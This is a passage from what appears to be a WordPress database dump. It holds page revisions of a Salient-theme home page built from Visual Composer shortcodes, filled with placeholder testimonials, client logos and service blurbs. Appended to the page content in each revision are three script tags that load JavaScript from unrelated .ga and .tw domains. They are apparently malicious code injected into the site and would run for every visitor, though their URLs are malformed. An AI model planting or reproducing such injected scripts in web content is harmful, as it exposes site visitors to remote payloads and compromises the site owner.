shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"accent-color-dark\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"all\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2017-12-14 04:19:22','2017-12-14 04:19:22','',5,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/5-revision-v1/',0,'revision','',0),(6243,1,'2017-12-14 04:21:21','2017-12-14 04:21:21','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"accent-color-dark\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"news-and-event\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2017-12-14 04:21:21','2017-12-14 04:21:21','',5,'http://sandbox.futuremediatrix.com/medikpro/2017/12/14/5-revision-v1/',0,'revision','',0),(6244,1,'2017-12-14 04:22:19','2017-12-14 04:22:19','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"accent-color-dark\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" 